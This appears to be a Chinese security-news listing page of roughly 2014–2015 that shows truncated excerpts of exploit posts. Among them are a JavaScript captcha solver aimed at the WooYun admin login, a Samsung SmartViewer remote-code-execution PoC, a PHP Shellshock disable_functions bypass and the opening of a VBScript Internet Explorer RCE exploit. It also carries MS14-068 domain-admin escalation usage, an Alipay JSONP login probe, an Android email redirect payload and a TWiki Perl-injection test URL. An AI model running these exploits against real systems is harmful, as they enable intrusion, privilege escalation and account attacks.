JS破解乌云验证码,JavaScript 验证码识别,js验证码识别

JS破解乌云验证码 p.z (谈钞票伤感情 谈感情又伤钞票又伤感情) | 2015-01-17 15:35 以后盲打乌云后台有验证码也不怕啦 (function(){ function decaptcha(image){ var canvas = document.createElement("canvas").getContext('2d'); var result = ''; var letter = [[],[],[],[]]; var letterArea = { '0': {'x1':14, 'x2':21,

Samsung SmartViewer BackupToAvi 3.0 代码执行漏洞EXP

Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution。 <html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = "

安卓手机邮件客户端钓鱼漏洞,Android 邮件钓鱼 [CVE-2014-4925]

视频: 安卓邮件客户端漏洞测试 FD 论坛上刚爆出的一个漏洞 poc: <meta http-equiv="refresh" content="0;URL='http://www.maliciousurl.com'" /> 攻击者可以构造一个邮件发给目标并且重定向到固定页面 详情可以 点击 Full Disclosure: Good for Enterprise Android HTML Injection

JSON应用:判断支付宝是否登录

JSON应用:判断支付宝是否登录 专注XSS三十年 | 2014-12-31 03:16 通过JSON判断登录状态 https://lab.alipay.com/user/msgcenter/getMsgInfosNew.json?_callback=xss&_input_charset=utf-8&ctoken=222&_=1419965709755 已登录: zozi({"popMsg":false,"infos":[],"totalCount":6,"stat":"ok","isRead":false}) 未登录: zozi({"target":"https://auth.alipay.com/login/index.htm?goto=","stat":"deny"}) 支付宝里有很多类似的JSON,虽然请求里

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> OPTIONS: -p <clearPassword> --rc4 <ntlmHash> Example usage : Linux (tested with

iSniff GPS:WIFI被动嗅探工具,嗅探附近无线设备广播泄漏信息定位

iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks. iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in

贝叶斯安全应用 (1)

贝叶斯安全应用 (1) 杀戮 (某无业游民) | 2014-11-24 18:12 之前在微博上看到一个妹纸分享了一个IBM的paper,关于通过贝叶斯推导数据泄露,很有趣,当然算法本

PHP 5.x - Bypass Disable Functions (via Shellshock)

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"

Piwigo <= v2.6.0 - Blind SQL Injection

Piwigo <= v2.6.0 - Blind SQL Injection -------------------------------------------------------------------------------- From: Manuel Garcia Cardenas <advidsec () gmail com> Date: Wed, 12 Nov 2014 09:56:22 +0100 -------------------------------------------------------------------------------- ============================================= MGC ALERT 2014-001 - Original release date: January 12, 2014 - Last revised: November 12, 2014 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Blind SQL Injection in Piwigo <= v2.6.0 II. BACKGROUND ------------------------- Piwigo is a web application management photo albums, available under the License GPL.

【0day】win95 + ie3 - win10 + ie11 全版本IE浏览器远程代码执行漏洞

alliedve.htm //* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0)

Remote Perl code execution with query string to debug TWiki plugins

影响版本: * TWiki-6.0.0 (TWikiRelease06x00x00) * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04) * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) 测试方法: http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit 修复方式: twiki/lib/TWiki/Plugins.pm Patch to sanitize the 'debugenableplugins' parameter: =======( 8>< CUT )=============================================== --- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500 +++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400